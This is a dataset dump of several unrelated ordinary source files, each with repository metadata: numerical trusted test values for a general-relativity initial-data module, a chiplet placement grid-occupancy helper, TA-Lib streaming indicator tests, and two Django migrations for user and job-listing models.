] | 66 | 2018-06-26T22:18:09.000Z | 2022-02-09T21:12:33.000Z | FishboneMoncriefID/tests/trusted_values_dict.py | ksible/nrpytutorial | 4ca6e9da22def2a9c9bcbcad75847fd1db159f4b | [
"BSD-2-Clause"
] | 14 | 2020-02-13T16:09:29.000Z | 2021-11-12T14:59:59.000Z | FishboneMoncriefID/tests/trusted_values_dict.py | ksible/nrpytutorial | 4ca6e9da22def2a9c9bcbcad75847fd1db159f4b | [
"BSD-2-Clause"
] | 30 | 2019-01-09T09:57:51.000Z | 2022-03-08T18:45:08.000Z | from mpmath import mpf, mp, mpc
from UnitTesting.standard_constants import precision
mp.dps = precision
trusted_values_dict = {}
# Generated on: 2019-10-17
# 2019-10-17: added uBL4D[],uBL4U[],uKS4U[]
trusted_values_dict['FishBoneMoncriefID__FishboneMoncriefID__globals'] = {'hm1': mpf('-0.171485955353078502409782000685'), 'IDalpha': mpf('0.755931060760646734042892329128'), 'IDbetaU[0]': mpf('0.214647582556345478472109360788'), 'IDbetaU[1]': mpf('0.241217364020809745026116799651'), 'IDbetaU[2]': mpf('0.281800155328952481540896834564'), 'IDgammaDD[0][0]': mpf('2.03851677635221747252808792529'), 'IDgammaDD[0][1]': mpf('0.0765438379382772951846664774809'), 'IDgammaDD[0][2]': mpf('0.570539327433565151458524763213'), 'IDgammaDD[1][0]': mpf('0.0765438379382772951846664774809'), 'IDgammaDD[1][1]': mpf('0.913606065931442108137857582766'), 'IDgammaDD[1][2]': mpf('-0.103931622633820480927404911623'), 'IDgammaDD[2][0]': mpf('0.570539327433565151458524763213'), 'IDgammaDD[2][1]': mpf('-0.103931622633820480927404911623'), 'IDgammaDD[2][2]': mpf('1.40437373720499632990640350854'), 'IDKDD[0][0]': mpf('0.241372059893883246591607766283'), 'IDKDD[0][1]': mpf('-0.343388055113192085165370755198'), 'IDKDD[0][2]': mpf('-0.590459359927831888413702466884'), 'IDKDD[1][0]': mpf('-0.343388055113192085165370755198'), 'IDKDD[1][1]': mpf('0.401858289197972155074762087828'), 'IDKDD[1][2]': mpf('-0.422578171813805727676385503333'), 'IDKDD[2][0]': mpf('-0.590459359927831888413702466884'), 'IDKDD[2][1]': mpf('-0.422578171813805727676385503333'), 'IDKDD[2][2]': mpf('-0.013929878808310394879734504443'), 'IDValencia3velocityU[0]': mpf('-0.0100201358532234154260289073442'), 'IDValencia3velocityU[1]': mpf('0.580690518031488621148890984891'), 'IDValencia3velocityU[2]': mpf('0.37278552232712119473473993627'), 'rho_initial': mpf('0.284819845942236515284909115899'), 'uBL4D[0]': mpf('-0.614072962517390468138181646896'), 'uBL4D[1]': mpf('0.0'), 'uBL4D[2]': mpf('0.0'), 'uBL4D[3]': mpf('0.105130532924779727240517791034'), 'uBL4U[0]': mpf('2.13294264904845268804664985272'), 'uBL4U[1]': mpf('0.0'), 'uBL4U[2]': mpf('0.0'), 'uBL4U[3]': mpf('0.858967220098163204426095668694'), 'uKS4U[0]': 
mpf('2.13294264904845268804664985272'), 'uKS4U[1]': mpf('0.0'), 'uKS4U[2]': mpf('0.0'), 'uKS4U[3]': mpf('0.858967220098163204426095668694')}
| 231.7 | 2,114 | 0.738023 | 247 | 2,317 | 6.882591 | 0.251012 | 0.082353 | 0.032353 | 0.010588 | 0.098824 | 0 | 0 | 0 | 0 | 0 | 0 | 0.507463 | 0.045749 | 2,317 | 9 | 2,115 | 257.444444 | 0.26142 | 0.028485 | 0 | 0 | 1 | 0 | 0.703292 | 0.525801 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.4 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
2370f61339a04b3037b99e9f86f2f51ec5fa0a79 | 4,217 | py | Python | block_occupation.py | bu-icsg/TAP-2.5D | 3a3f4e5a4d019b2d9cda1f72d8d1755238845dbb | [
"Apache-2.0"
] | 4 | 2021-05-07T11:53:03.000Z | 2022-03-15T07:17:51.000Z | block_occupation.py | bu-icsg/TAP-2.5D | 3a3f4e5a4d019b2d9cda1f72d8d1755238845dbb | [
"Apache-2.0"
] | null | null | null | block_occupation.py | bu-icsg/TAP-2.5D | 3a3f4e5a4d019b2d9cda1f72d8d1755238845dbb | [
"Apache-2.0"
] | null | null | null | def print_grid(grid):
for i in grid:
print (i)
    print()
def initialize_grid(mi):
grid = [[0 for _ in range(mi+1)] for _ in range(mi+1)]
# boundary protection
for i in range(mi+1):
grid[0][i] = 1
grid[mi][i] = 1
grid[i][0] = 1
grid[i][mi] = 1
return grid
# width and height are parameters passed in; they are assumed to already include the microbump overhead, which must be added before calling this module.
def check_block_occupation(grid, granularity, xx, yy, width, height):
    # print(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1)
    for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
        if sum(grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1]):
            return False
    return True


def check_left_occupation(grid, granularity, xx, yy, width, height):
    i = int(xx/granularity) - int(width/2/granularity+0.49)
    if i <= 0:
        return False
    if sum(grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1]):
        # print(i, grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])
        return False
    else:
        return True


def check_right_occupation(grid, granularity, xx, yy, width, height):
    i = int(xx/granularity) + int(width/2/granularity+0.49)
    intp_size = (len(grid) - 1) * granularity
    if i >= intp_size:
        return False
    if sum(grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1]):
        # print(i, grid[i][int(yy/granularity)-int(height/2/granularity+0.49):int(yy/granularity)+int(height/2/granularity+0.49)+1])
        return False
    else:
        return True


def check_down_occupation(grid, granularity, xx, yy, width, height):
    j = int(yy/granularity) - int(height/2/granularity+0.49)
    if j <= 0:
        return False
    for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
        if grid[i][j]:
            # print(i, j, grid[i][j])
            return False
    return True


def check_up_occupation(grid, granularity, xx, yy, width, height):
    j = int(yy/granularity) + int(height/2/granularity+0.49)
    intp_size = (len(grid) - 1) * granularity
    if j >= intp_size:
        return False
    for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
        if grid[i][j]:
            # print(i, j, grid[i][j])
            return False
    return True


def set_block_occupation(grid, granularity, xx, yy, width, height, chiplet_index):
    for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
        for j in range(int(yy/granularity)-int(height/2/granularity+0.49), int(yy/granularity)+int(height/2/granularity+0.49)+1):
            grid[i][j] = chiplet_index + 2
    return grid


def clear_block_occupation(grid, granularity, xx, yy, width, height, chiplet_index):
    for i in range(int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1):
        for j in range(int(yy/granularity)-int(height/2/granularity+0.49), int(yy/granularity)+int(height/2/granularity+0.49)+1):
            if grid[i][j] != chiplet_index + 2:
                print(chiplet_index, grid[i][j], i, j)
                print('x- ', int(xx/granularity)-int(width/2/granularity+0.49), int(xx/granularity)+int(width/2/granularity+0.49)+1, 'y-', int(yy/granularity)-int(height/2/granularity+0.49), int(yy/granularity)+int(height/2/granularity+0.49)+1)
                print("something wrong, chiplet index mismatch")
                exit()
            grid[i][j] = 0
    return grid
def replace_block_occupation(grid, granularity, xx_new, yy_new, width, height, chiplet_index):
    for i in range(int(xx_new/granularity)-int(width/2/granularity+0.49), int(xx_new/granularity)+int(width/2/granularity+0.49)+1):
        for j in range(int(yy_new/granularity)-int(height/2/granularity+0.49), int(yy_new/granularity)+int(height/2/granularity+0.49)+1):
            if (grid[i][j] != chiplet_index + 2) and (grid[i][j] != 0):
                return False
    return True
| 47.920455 | 232 | 0.698601 | 719 | 4,217 | 4.045897 | 0.097357 | 0.182881 | 0.169818 | 0.195944 | 0.850464 | 0.820213 | 0.805775 | 0.805775 | 0.790306 | 0.790306 | 0 | 0.051184 | 0.129002 | 4,217 | 88 | 233 | 47.920455 | 0.740811 | 0.135879 | 0 | 0.486111 | 0 | 0 | 0.012394 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.138889 | false | 0 | 0 | 0 | 0.402778 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
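The occupancy helpers above all share one indexing scheme: a block's center coordinate divided by the granularity, plus or minus half the block size in cells (the `+0.49` term rounds the half-size to the nearest cell). A minimal, self-contained sketch of how `initialize_grid`, `check_block_occupation` and `set_block_occupation` fit together — the helpers are restated here in simplified form with a hypothetical `half_cells` helper, and the grid size, granularity and coordinates are illustrative:

```python
def half_cells(size, granularity):
    # Half the block size, in grid cells, rounded to nearest (the +0.49 trick).
    return int(size / 2 / granularity + 0.49)

def initialize_grid(mi):
    grid = [[0 for _ in range(mi + 1)] for _ in range(mi + 1)]
    for i in range(mi + 1):  # boundary protection: mark the border occupied
        grid[0][i] = grid[mi][i] = grid[i][0] = grid[i][mi] = 1
    return grid

def check_block_occupation(grid, granularity, xx, yy, width, height):
    cx, cy = int(xx / granularity), int(yy / granularity)
    hw, hh = half_cells(width, granularity), half_cells(height, granularity)
    for i in range(cx - hw, cx + hw + 1):
        if sum(grid[i][cy - hh:cy + hh + 1]):
            return False  # some cell in the footprint is already taken
    return True

def set_block_occupation(grid, granularity, xx, yy, width, height, chiplet_index):
    cx, cy = int(xx / granularity), int(yy / granularity)
    hw, hh = half_cells(width, granularity), half_cells(height, granularity)
    for i in range(cx - hw, cx + hw + 1):
        for j in range(cy - hh, cy + hh + 1):
            grid[i][j] = chiplet_index + 2  # 0/1 are reserved for free/boundary
    return grid

grid = initialize_grid(20)                                 # 20x20 units, granularity 1
assert check_block_occupation(grid, 1, 10, 10, 4, 4)       # region is free
set_block_occupation(grid, 1, 10, 10, 4, 4, chiplet_index=0)
assert not check_block_occupation(grid, 1, 10, 10, 4, 4)   # now occupied
```

Cell values are encoded as `chiplet_index + 2` so that `0` (free) and `1` (boundary) stay distinct, which is why `clear_block_occupation` can verify ownership before freeing cells.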
2374640b4615181342c92933ad7ffe816799f4db | 2,503 | py | Python | talib/test_stream.py | aberja/ta-lib | 75fbfa86824b675ac03b7e30aaa2eaade8a817cc | [
"BSD-2-Clause"
] | 1 | 2022-03-10T02:51:59.000Z | 2022-03-10T02:51:59.000Z | talib/test_stream.py | aberja/ta-lib | 75fbfa86824b675ac03b7e30aaa2eaade8a817cc | [
"BSD-2-Clause"
] | null | null | null | talib/test_stream.py | aberja/ta-lib | 75fbfa86824b675ac03b7e30aaa2eaade8a817cc | [
"BSD-2-Clause"
] | 1 | 2021-05-31T11:51:01.000Z | 2021-05-31T11:51:01.000Z |

import numpy as np
import pandas as pd
import talib
from talib import stream
def test_streaming():
    a = np.array([1, 1, 2, 3, 5, 8, 13], dtype=float)
    r = stream.MOM(a, timeperiod=1)
    assert r == 5
    r = stream.MOM(a, timeperiod=2)
    assert r == 8
    r = stream.MOM(a, timeperiod=3)
    assert r == 10
    r = stream.MOM(a, timeperiod=4)
    assert r == 11
    r = stream.MOM(a, timeperiod=5)
    assert r == 12
    r = stream.MOM(a, timeperiod=6)
    assert r == 12
    r = stream.MOM(a, timeperiod=7)
    assert np.isnan(r)


def test_streaming_pandas():
    a = pd.Series([1, 1, 2, 3, 5, 8, 13])
    r = stream.MOM(a, timeperiod=1)
    assert r == 5
    r = stream.MOM(a, timeperiod=2)
    assert r == 8
    r = stream.MOM(a, timeperiod=3)
    assert r == 10
    r = stream.MOM(a, timeperiod=4)
    assert r == 11
    r = stream.MOM(a, timeperiod=5)
    assert r == 12
    r = stream.MOM(a, timeperiod=6)
    assert r == 12
    r = stream.MOM(a, timeperiod=7)
    assert np.isnan(r)


def test_CDL3BLACKCROWS():
    o = np.array([39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 40.32, 40.51, 38.09, 35.00])
    h = np.array([40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 41.69, 40.84, 38.12, 35.50])
    l = np.array([35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 39.26, 36.73, 33.37, 30.03])
    c = np.array([40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.46, 37.08, 33.37, 30.03])
    r = stream.CDL3BLACKCROWS(o, h, l, c)
    assert r == -100


def test_CDL3BLACKCROWS_pandas():
    o = pd.Series([39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 39.00, 40.32, 40.51, 38.09, 35.00])
    h = pd.Series([40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 40.84, 41.69, 40.84, 38.12, 35.50])
    l = pd.Series([35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 35.80, 39.26, 36.73, 33.37, 30.03])
    c = pd.Series([40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.29, 40.46, 37.08, 33.37, 30.03])
    r = stream.CDL3BLACKCROWS(o, h, l, c)
    assert r == -100


def test_MAXINDEX():
    a = np.array([1., 2, 3, 4, 5, 6, 7, 8, 7, 7, 3, 4, 5, 6, 7, 8, 9, 2, 3, 4, 5, 15])
    r = stream.MAXINDEX(a, 10)
    assert r == 21
| 39.730159 | 145 | 0.569716 | 546 | 2,503 | 2.598901 | 0.122711 | 0.084567 | 0.118393 | 0.146582 | 0.80902 | 0.80902 | 0.800564 | 0.789288 | 0.789288 | 0.789288 | 0 | 0.337576 | 0.215342 | 2,503 | 62 | 146 | 40.370968 | 0.384929 | 0 | 0 | 0.592593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.314815 | 1 | 0.092593 | false | 0 | 0.074074 | 0 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
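For reference, `stream.MOM` returns only the most recent momentum value: the difference between the last sample and the sample `timeperiod` steps earlier, or NaN when there is not enough history. A pure-Python sketch of that contract (the `mom_latest` helper is illustrative, not part of TA-Lib), matching the values asserted in the tests above:

```python
import math

def mom_latest(values, timeperiod):
    """Latest momentum: values[-1] - values[-1 - timeperiod]; NaN if unavailable."""
    if timeperiod >= len(values):
        return float("nan")
    return values[-1] - values[-1 - timeperiod]

a = [1, 1, 2, 3, 5, 8, 13]
assert mom_latest(a, 1) == 5    # 13 - 8
assert mom_latest(a, 2) == 8    # 13 - 5
assert mom_latest(a, 6) == 12   # 13 - 1
assert math.isnan(mom_latest(a, 7))  # only 7 samples: no value 7 steps back
```

This is why the streaming API is cheap in a live-trading loop: it computes a single scalar per call instead of the full indicator series.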
88b8e52bdb4d7a6307952af7fc93b05293b61e4d | 6,032 | py | Python | Users/migrations/0011_auto_20200422_2227.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | 1 | 2022-03-16T11:17:06.000Z | 2022-03-16T11:17:06.000Z | Users/migrations/0011_auto_20200422_2227.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | null | null | null | Users/migrations/0011_auto_20200422_2227.py | tifat58/lsv-c4-django-webexperiment | 6aa706ad36b9766fbbf4323fdcd6e5d7420f1e16 | [
"Apache-2.0"
] | null | null | null |

# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):

    dependencies = [
        ('Users', '0010_auto_20180606_0002'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='country',
            name='country_name_bg',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_bs',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_cs',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_de',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_en',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_hr',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_mk',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_pl',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_ru',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_sk',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_sl',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_sr',
        ),
        migrations.RemoveField(
            model_name='country',
            name='country_name_uk',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_bg',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_bs',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_cs',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_de',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_en',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_hr',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_mk',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_pl',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_ru',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_sk',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_sl',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_sr',
        ),
        migrations.RemoveField(
            model_name='educationdegree',
            name='name_uk',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_bg',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_bs',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_cs',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_de',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_en',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_hr',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_mk',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_pl',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_ru',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_sk',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_sl',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_sr',
        ),
        migrations.RemoveField(
            model_name='gender',
            name='name_uk',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_bg',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_bs',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_cs',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_de',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_en',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_hr',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_mk',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_pl',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_ru',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_sk',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_sl',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_sr',
        ),
        migrations.RemoveField(
            model_name='language',
            name='language_name_uk',
        ),
    ]
| 27.049327 | 45 | 0.503316 | 467 | 6,032 | 6.205567 | 0.087794 | 0.376812 | 0.466529 | 0.538302 | 0.945825 | 0.945825 | 0.928571 | 0.4755 | 0 | 0 | 0 | 0.004608 | 0.388428 | 6,032 | 222 | 46 | 27.171171 | 0.78097 | 0.003481 | 0 | 0.842593 | 0 | 0 | 0.179897 | 0.003828 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009259 | 0 | 0.023148 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
004d7cc26d1bedd8ea738b3892e8fe8caae2a9bf | 9,645 | py | Python | backend/items/migrations/0001_initial.py | moon1ightx/jobify | e2b958d060391f63c5b4d58a8804a779651c78de | [
"MIT"
] | null | null | null | backend/items/migrations/0001_initial.py | moon1ightx/jobify | e2b958d060391f63c5b4d58a8804a779651c78de | [
"MIT"
] | null | null | null | backend/items/migrations/0001_initial.py | moon1ightx/jobify | e2b958d060391f63c5b4d58a8804a779651c78de | [
"MIT"
] | null | null | null |

# Generated by Django 3.0.3 on 2020-05-03 06:26
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import items.models
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('auth', '0011_update_proxy_permissions'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Company',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100)),
                ('address', models.CharField(max_length=200)),
                ('city', models.CharField(max_length=100)),
                ('description', models.TextField()),
                ('thumbnailPath', models.ImageField(blank=True, null=True, upload_to='')),
                ('linkedin_link', models.CharField(blank=True, max_length=200, null=True)),
                ('instagram_link', models.CharField(blank=True, max_length=200, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Degree',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='JobArea',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, null=True)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='PlanItem',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
                ('useful_links', models.CharField(blank=True, max_length=200, null=True)),
                ('tutorials', models.CharField(blank=True, max_length=200, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Story',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, null=True)),
                ('thumbnailPath', models.ImageField(blank=True, null=True, upload_to='')),
                ('source', models.CharField(blank=True, max_length=200, null=True)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
            ],
        ),
        migrations.CreateModel(
            name='Techno',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('description', models.TextField()),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='University',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Vacancy',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('experience', models.IntegerField()),
                ('description', models.TextField()),
                ('salary', models.IntegerField(blank=True, null=True)),
                ('perks', models.TextField(blank=True, null=True)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
                ('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vacancies', to='items.Company')),
                ('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='vacancies', to='items.JobArea')),
                ('techno', models.ManyToManyField(to='items.Techno')),
            ],
        ),
        migrations.CreateModel(
            name='Stack',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('description', models.TextField()),
                ('popularity', models.IntegerField(blank=True, null=True)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
                ('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='stack', to='items.JobArea')),
                ('techno', models.ManyToManyField(to='items.Techno')),
            ],
        ),
        migrations.CreateModel(
            name='Roadmap',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
                ('plan', models.ManyToManyField(to='items.PlanItem')),
                ('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddField(
            model_name='planitem',
            name='techno',
            field=models.ManyToManyField(to='items.Techno'),
        ),
        migrations.CreateModel(
            name='Internship',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('start_date', models.DateField(blank=True, null=True)),
                ('description', models.TextField()),
                ('salary', models.IntegerField(blank=True, null=True)),
                ('duration', models.IntegerField(blank=True, null=True)),
                ('created_on', models.DateField(auto_now_add=True, null=True)),
                ('company', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='intenrships', to='items.Company')),
                ('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='intenrships', to='items.JobArea')),
                ('techno', models.ManyToManyField(to='items.Techno')),
            ],
        ),
        migrations.CreateModel(
            name='Hunter',
            fields=[
                ('user', models.OneToOneField(default=1, on_delete=django.db.models.deletion.CASCADE, primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
                ('phone', models.CharField(blank=True, max_length=20, null=True)),
                ('birthday', models.DateField(blank=True, null=True)),
                ('city', models.CharField(blank=True, max_length=100, null=True)),
                ('thumbnailPath', models.ImageField(blank=True, null=True, upload_to=items.models.upload_user_photo)),
                ('about', models.CharField(blank=True, max_length=200, null=True)),
                ('github_link', models.CharField(blank=True, max_length=200, null=True)),
                ('linkedin_link', models.CharField(blank=True, max_length=200, null=True)),
                ('instagram_link', models.CharField(blank=True, max_length=200, null=True)),
                ('account_created_on', models.DateField(auto_now_add=True, null=True)),
                ('degree', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='hunters', to='items.Degree')),
                ('job_area', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='hunters', to='items.JobArea')),
                ('techno', models.ManyToManyField(to='items.Techno')),
                ('univer', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='hunters', to='items.University')),
            ],
        ),
        migrations.CreateModel(
            name='Hackathon',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=100)),
                ('description', models.TextField(blank=True, null=True)),
                ('thumbnailPath', models.ImageField(blank=True, null=True, upload_to='')),
                ('place', models.CharField(max_length=100)),
                ('time', models.DateField(blank=True, null=True)),
                ('source', models.CharField(max_length=200)),
                ('created_on', models.DateTimeField(auto_now_add=True)),
                ('job_area', models.ManyToManyField(to='items.JobArea')),
            ],
        ),
    ]
| 54.185393 | 167 | 0.583204 | 979 | 9,645 | 5.594484 | 0.123596 | 0.055505 | 0.059156 | 0.05587 | 0.849188 | 0.820887 | 0.791309 | 0.784554 | 0.751506 | 0.707687 | 0 | 0.014142 | 0.266874 | 9,645 | 177 | 168 | 54.491525 | 0.76043 | 0.004666 | 0 | 0.635294 | 1 | 0 | 0.111586 | 0.003021 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.023529 | 0 | 0.047059 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
